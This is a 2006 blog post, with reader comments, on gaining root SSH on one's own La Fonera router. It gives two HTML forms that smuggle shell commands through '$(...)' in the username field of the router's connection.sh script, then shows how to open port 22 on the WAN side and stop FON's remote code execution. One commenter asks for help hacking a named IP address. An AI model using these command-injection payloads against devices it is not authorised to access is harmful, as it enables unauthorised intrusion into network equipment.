Skip to: site menu | categories | main content

Hacking Fonera

Coding my Life

Blog Home » Hacking Fonera

Hacking Fonera

Yesterday I received my Fonera. The last two days i spend on trying to run an ssh daemon on it. After a lot of searching and surfing, i found finally with the help of this two sites a way to force fonera run ssh. I will shortly sum up the hack, it worked successful with 0.7.1 r1 fon firmware (if you have the 0.7.1.2 firmware you have to reset it.):

First you have to write to two html-pages which will inject code in your Fon-Router. Save the following code as step1.html:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Save the next html code as step2.html.

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Now connect to your MyPlace Network, open the both sites and just click on the "Submit" button(first at the step1.html then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
ssh root@192.168.10.1

For enabling a permanent ssh access you have to move dropbear to S50 dropbear:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

In the /etc/firewall.user you have to uncomment this lines:

# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT

Now you should prevent Fon from executing received code, by editing /bin/thinclient. You have to comment the last line and add another line, so that the last two lines look like this:

#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

Now you have ssh daemon on your fonera.


btw: thanks a lot cologne.idle and "Пожалуйста не пойте под фанеру!"
Posted by kalkin on 28/11/2006
< Spamtraining | Things you do not want your system administrator to say >

Verwandte Links:


Werbung:


3 Trackbacks


Hacking La Fonera
Today i received my Fonera.Fonera has been designed not to be hacked. Really?Hacking the La FoneraOpenWrtDocs HardwareDd-wrt about La FoneraLa Fonera FlashingHacking FoneraOpenwrt K on la Fonera without serial consoleLa Fonera dissection and hackInside th
Weblog: Alessandro "jekil" Tanasi blog
Tracked: Jan 20, 19:50
Fonera Downgrade
If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.
Weblog: Coding my Life
Tracked: Feb 16, 15:28

Weblog: Anonymous
Tracked: Feb 19, 04:14

72 Comments

Display comments as (Linear | Threaded)

Aschenbash0r Says,

Wednesday, November 29. 2006 at 14:31 (Link) (Reply)

Пожалуйста не пойте под фанеру!
=
Please do not sing under plywood!

I copy&pasted it into an online translator ;-)

kalkin Replied,

Wednesday, November 29. 2006 at 16:11 (Link) (Reply)

Never trust online translators ;-) .

ARARAT Replied,

Sunday, March 11. 2007 at 21:41 (Link) (Reply)

Thnaks for the code. its unsefull for me. Martin

Chance Says,

Thursday, November 30. 2006 at 21:14 (Reply)

Now if we can just get some decent firmware with a web interface for this device.

kalkin Replied,

Thursday, November 30. 2006 at 23:54 (Reply)

There are some people who are porting dd-wrt to fonera. dd-wrt has also a webinterface. Fore more information look in the dd-wrt forum.

Chance added this comment,

Friday, December 1. 2006 at 07:59 (Reply)

I'm all over it. I just got mine today, and within 5 minutes I was ssh'd in and messing with stuff. I am sure I can get better at the console stuff if I have to use it, but I am lazy and would like a web interface. I have been using DD-WRT for ~2 years and love it so that would be my first choice.
Thanks

matyas added this comment,

Thursday, December 28. 2006 at 18:06 (Reply)

Hi,



I have just came accross your website. I have received a fonera too, and i have some (maybe stupid) questions: why is it good that i can have an SSH access to my fonera? what is the advantage of that? and why is it good for me that i prevent FON from executing code on my box?



thank you very much

Matyas (from Hungary)

Riku added this comment,

Monday, January 15. 2007 at 21:34 (Reply)

> why is it good that i can have an SSH access to my fonera?

You can access to that Linux and make some changes. It's also more secure than just telnet.

> what is the advantage of that?

You can make changes.

> and why is it good for me that i prevent FON from executing code on my box?

It's security thing. FON box will execute every code it will receive from FON with out these hacks.

Jay Says,

Tuesday, December 12. 2006 at 08:55 (Reply)

I dont think i understood the thing about uncommenting the lines in the firewall.
Can anybody help me?

Fabs Says,

Tuesday, December 12. 2006 at 14:28 (Reply)

imho you need to write "cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')", in your code the day will not be written

kalkin Replied,

Monday, December 18. 2006 at 18:20 (Reply)

Thank you, I edited the line.

geek added this comment,

Wednesday, February 21. 2007 at 13:45 (Reply)

By the way if you don't want those thinclients filling your Fonera's memory,

instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

use this:
if [ -s /tmp/.thinclient.sh ] ; then
for f in /tmp/thin* ; do
:
done
if [ -f "$f" ]; then
if [ $(md5sum /tmp/.thinclient.sh | cut -d ' ' -f 1) != $(md5sum `ls $f` | cut -d ' ' -f 1) ] ; then
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
else
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
fi


This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work :-)

kalkin added this comment,

Wednesday, February 21. 2007 at 17:24 (Reply)

Great idea, thanks. :-)

fon-fan Replied,

Friday, January 5. 2007 at 16:02 (Link) (Reply)

when will dd-wrt be here?
do you have some more informations, links to threads on the forum?
am i right that linux 2.6 is the only thing to be ported ?

kalkin added this comment,

Friday, January 5. 2007 at 16:16 (Reply)

http://tinyurl.com/u79m4

There is a forum thread about ddwrt on fonera.

Fabs Says,

Tuesday, December 12. 2006 at 15:53 (Reply)

By the way: Wouldn't it be a easier to just remove the cronjob that executes /bin/thinclient every hour? crontab -r?

Late Replied,

Saturday, December 16. 2006 at 09:08 (Link) (Reply)

You can remove the crontab, that works too, but it might be interesting to see what the thinclient fetches for you.

futejia Says,

Friday, December 22. 2006 at 02:29 (Link) (Reply)

Here is another howto http://futejia.blogspot.com/2006/12/my-way-to-hack-lafonera.html
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more then two hours to use it.

Barol Replied,

Monday, December 25. 2006 at 20:02 (Reply)

dd-wrt will not herefor a while. But in the meanwhile we have Openwrt ;-) http://www.dd-wrt.com/phpBB2/viewtopic.php?p=49142

Jimmi Says,

Saturday, December 23. 2006 at 21:26 (Reply)

Lasst es sein !
Diese Sache muss man unterstützen, nicht
hacken !

futejia Replied,

Sunday, December 24. 2006 at 21:54 (Link) (Reply)

1) Nur ssh Zugriff drauf verhindert ja nicht, das die FON Software läuft
2) Ich glaube Google und Ebay haben genug geld. Die brauchen unsere Unterstützung nicht.

Stefan Tomanek Replied,

Saturday, December 30. 2006 at 09:42 (Link) (Reply)

Take a look at this:
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml

It's not about sabotaging FON, it's about keeping in control of your network.

jarena Says,

Wednesday, January 3. 2007 at 23:30 (Reply)

After doing this, I have SSH access to La Fonera, but I have lost internet connection via wifi. Under wireless networks I can only see my private network, not the public one. Any ideas? :-S

jarena Replied,

Thursday, January 4. 2007 at 13:54 (Reply)

Al final el problema sólo era que tarda una barbaridad en tomar una ip por dhcp, y mientras no la toma no se ve la red pública. No sé si será algo común o no que tarde tanto, puede que sí, ya que por algún sitio leí que la flash de la fonera era muy lenta prolongando así el tiempo de arranque.

jarena Replied,

Thursday, January 4. 2007 at 14:04 (Reply)

Ooops, sorry for using spanish hehe. In English:

At last the problem was La Fonera was taking too long to get an ip via DHCP, and while this is not done the public network can't be seen. I don't know is this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.

Maurizio added this comment,

Friday, February 2. 2007 at 16:47 (Reply)

I have the same issue: SSH access but without Internet connection. How can I overcome such slowness of IP assignment by DHCP?

kalkin added this comment,

Friday, February 2. 2007 at 18:05 (Reply)

Do it take long to get an ip, if you are booting?

I have the same problem, if i'm changing from fixed ip to DHCP. The change take really long.
I've made experience that the best way in this cases is to restart the fonera.

Maurizio added this comment,

Friday, February 2. 2007 at 18:16 (Reply)

Thank you for your reply.

Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.

cable Says,

Thursday, February 1. 2007 at 14:40 (Reply)

When using direct cable link,
You should change the web server address to 169.254.255.1 instead of 192.168.10.1. Both in the html page and the ssh session.

Rui Ponte Says,

Wednesday, February 7. 2007 at 22:29 (Reply)

Users with the release 0.7.1.2 can't do this :-(

kalkin Replied,

Thursday, February 8. 2007 at 13:41 (Reply)

If you got the fonera with the 0.7.1.2 and don't updated it via Webinterface. you can reset it to the 0.7.1.

You take something spiky (for example a pin) and press the reset-button, below the fonera, for 5sec. It should be reseted to the 0.7.1 firmware.

Torbar added this comment,

Saturday, February 10. 2007 at 05:16 (Link) (Reply)

Remember to unplug the ethernet cable before resetting the router. Otherwise it will keep on auto updating the firmware back to 0.7.1.2 and you will get nowhere ;-)

Rui Ponte added this comment,

Wednesday, February 14. 2007 at 04:15 (Reply)

What if i've updated via webinterface?

Stefan Tomanek added this comment,

Wednesday, February 14. 2007 at 07:50 (Link) (Reply)

Then you lose. Sorry, no more resets for you, the new firmware has been flashed permanently.

There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted

Paul added this comment,

Friday, February 23. 2007 at 21:51 (Reply)

any estimate on when this might be available? 7.1.2 is rapidly becoming pretty widespread, what with the free 10,000 routers that went out earlier this month (of which i got mine yesterday, woohoo!).

Tiago added this comment,

Thursday, February 15. 2007 at 16:36 (Reply)

I installed dd-wrt in my fonera, but yesterday i installed fon original firmware. I download fonera.tar.gz file, that someone told me it is fonera firmware 0.7.1-r1 version but with the first 519 bytes cut. But, when i flashed the fonera and access web interface i saw that the firmware is 0.7.1-r2. I tried do reset fonera mas it didn't change firmware to 0.7.1-r1. Can I do something to hack fonera? I don't have a serial cabel :s

Stefan Tomanek added this comment,

Thursday, February 15. 2007 at 17:45 (Link) (Reply)

Get a serial cable or wait until our new hack "kolofonium" is released. We are still waiting for widespread distribution of 0.7.1.2

Michael Henn Says,

Friday, February 16. 2007 at 05:04 (Reply)

How do I edit this file? /etc/firewall.user

Thanks for any help from anyone!

sp00nix Replied,

Friday, February 16. 2007 at 08:51 (Link) (Reply)

vi /etc/firewall.user
google the VI command list, its kinda confusing how to work

narmacil Says,

Sunday, February 18. 2007 at 07:21 (Reply)

check this out: this is an error message I get when trying to SSH in... Any idea how to get around this?

@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.

narmacil Replied,

Sunday, February 18. 2007 at 07:59 (Reply)

nevermind - it was the ssh client on my side, my bad.

Smiley Says,

Friday, February 23. 2007 at 17:25 (Reply)

I'm trying to this on my Mac (10.4.8-) but the basic html just stays like that and won't display. I've tried to open step1/2 in Safari, Firefox, Opera, Realplayer. Seems such a simple thing to do but maybe OSX now blocks HTML somehow?

kalkin Replied,

Friday, February 23. 2007 at 23:24 (Reply)

I'm using Tiger too, but I have no problems.

Josh Says,

Saturday, February 24. 2007 at 04:49 (Reply)

OMFG NEED NEW RELEASE FOR 1.7.1.2 HELP THIS ISN"T WOKRKED!!

kalkin Replied,

Saturday, February 24. 2007 at 13:13 (Reply)

Look here: http://mrmuh.blogspot.com/2007/01/codename-kolofonium-realease-date.html

Antonio Says,

Saturday, February 24. 2007 at 12:05 (Link) (Reply)

Hi everybody. I wrote a script that transforms La Fonera as a Repeater and Access Point, you can find it at http://www.blogin.it/fonera4.php
Hope you enjoy ...and improve

Antonio

Wenle Says,

Saturday, February 24. 2007 at 18:51 (Link) (Reply)

i have a problem, when i type in the first line of code:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

it responds -ash: $: not found

what does that mean? should i continue to second command?

kalkin Replied,

Saturday, February 24. 2007 at 19:34 (Reply)

You have to enter the commands without $>. Just enter:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Takenover83 Says,

Sunday, February 25. 2007 at 05:06 (Reply)

Does anyone have a fix for loosing Internet once the SSH mod has been installed?

I have my Fonera hooked up to a WRT54GS.


Also what local webserver work ok with this guide? I tried a couple, but got error's when using wget.

For example.

Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.

But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.

Paul Replied,

Sunday, February 25. 2007 at 07:42 (Reply)

i was able to restore internet connectivity by logging into my fon's web interface, and configuring the 'internet connection' for static IP. doesn't matter what you configure it to - use 55.55.55.55 if you like - but fill in all the fields, and click 'submit'. then go right back to the configs, and reset it back to DHCP. that was enough to force to grab onto my main router and talk to the world again.

Paul Says,

Sunday, February 25. 2007 at 07:45 (Reply)

i also wanted to note that if your fon says it's 7.1.2, be sure and go through coldtobi's instructions. http://blog.coldtobi.de/index.php?op=ViewArticle&articleId=7&blogId=1
i was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. use coldtobi's page to reset the right way, and you'll be able to play soon yourself!

john earthquake Says,

Thursday, March 1. 2007 at 12:30 (Reply)

i've changed the fonera firmware...but now when i try to run the 2 pages e keeps asking me for a username and a password...any ideia ? thank you :-D

kalkin Replied,

Thursday, March 1. 2007 at 13:00 (Reply)

Reading carefully helps. User: root Pasword: admin. ;-)

Popup2u Says,

Friday, March 2. 2007 at 14:55 (Reply)

can help me hack my router 202.129.51.122

dltv Says,

Tuesday, March 6. 2007 at 09:45 (Link) (Reply)

does the heartbeat option work in DDWRT or do i need to get an advanced script?

Most importantly can you connect to the router via the Ethernet port with DDWRT? or does it have to be wirelessly? because i cant connect to 192.168.1.1

or whatever the right ip is i still cant connect to the DDWRT interface via ethernet cable only wirelessly

Wrote a tutorial on hacking it at dltv.wordpress.com

grazzt Says,

Tuesday, March 6. 2007 at 19:58 (Reply)

Is it possible to do these things with only the fon connected to a network card via the network cable?

I dont have any wifi cards yet.

I see the 192.168.* is for the wifi side.

The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).

Any help would be appreciated.

Thanks

grazzt Replied,

Tuesday, March 6. 2007 at 20:36 (Reply)

Sorry, for not reading, I see what to do with only a network cable and no wifi.

ANd it worked! :-)

ssd Says,

Thursday, March 8. 2007 at 01:26 (Reply)

i have followed the instructions here and here [http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing]. after doing step 3 and rebooting the wireless on the router stopped working. how do i get it to enable again? reset button doesnt work :-(

yea Replied,

Monday, March 12. 2007 at 01:42 (Reply)

Same here. After step 3 and rebooting the router just sits there and does nothing. I am not able to ssh or telnet into it. It is bricked.

dna Says,

Monday, March 12. 2007 at 13:01 (Link) (Reply)

where can i get the firmware version 0.7.1 ?

anyone send me e-mail that attached it?

kalkin Replied,

Monday, March 12. 2007 at 14:28 (Reply)

yoda voice : Google you ask have to!

:-D

jeff Says,

Monday, March 12. 2007 at 20:10 (Link) (Reply)

get the firmware 7.1 at the DD-WRT wiki on the la fonera its at the bottom of how to flash

Muhammad Waqas Says,

Tuesday, March 13. 2007 at 09:19 (Link) (Reply)

plz tell me simple way that how ca i get ip address or how can i use other computer from my computer plz i m very much fond of use the other computer from my plz plz plz plz.

dltv Says,

Tuesday, March 13. 2007 at 19:31 (Link) (Reply)

Read http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

Gives some networking advice.

grazzy Says,

Wednesday, March 14. 2007 at 19:22 (Link) (Reply)

For those just using a normal nic and NO wifi, the "hacked" fon will default to DHCP for the wan ip. That is, connect your hacked FON to your computer, and have your computer run a DHCP server (in linux this is easy, under windows, who knows).

Then the FON listens to port 8080 on the wan side.

Hope this helps anyone.

Jürgen Says,

Saturday, March 17. 2007 at 23:55 (Link) (Reply)

Great Post. Very helpfull informations. Thanks a lot. Jürgen from Germany. :-)

Strafverteidiger München Says,

Friday, April 20. 2007 at 17:41 (Link) (Reply)

This is great:

http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

But as well a helpfull information.

Strafverteidiger Freiburg Says,

Thursday, April 26. 2007 at 18:59 (Link) (Reply)

Thanks for the HTML Script.

eric Says,

Saturday, February 16. 2008 at 01:01 (Link) (Reply)

For those that are interested, here’s a site with great tutorials with screenshots for the newer Fonera firmware version 0.7.2-r3 It has guides for Redboot and flashing to DD-WRT and Legend firmware along with some other cool stuff.

http://www.fonerahacks.com

kenjiru Says,

Wednesday, May 14. 2008 at 17:39 (Link) (Reply)

I've got to firmware version 0.7.1 r2, but no ssh :-(

Any idea what to do now?

Computmaxer Says,

Monday, July 7. 2008 at 17:52 (Reply)

Ya'll should come check out the fonera-hacking community:
www.fonerahacks.com

nglrossi Says,

Thursday, February 12. 2009 at 16:37 (Reply)

Thanks for the clear howto, just hacked mine.
I am about to install dd-wrt now.

Angelo

Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA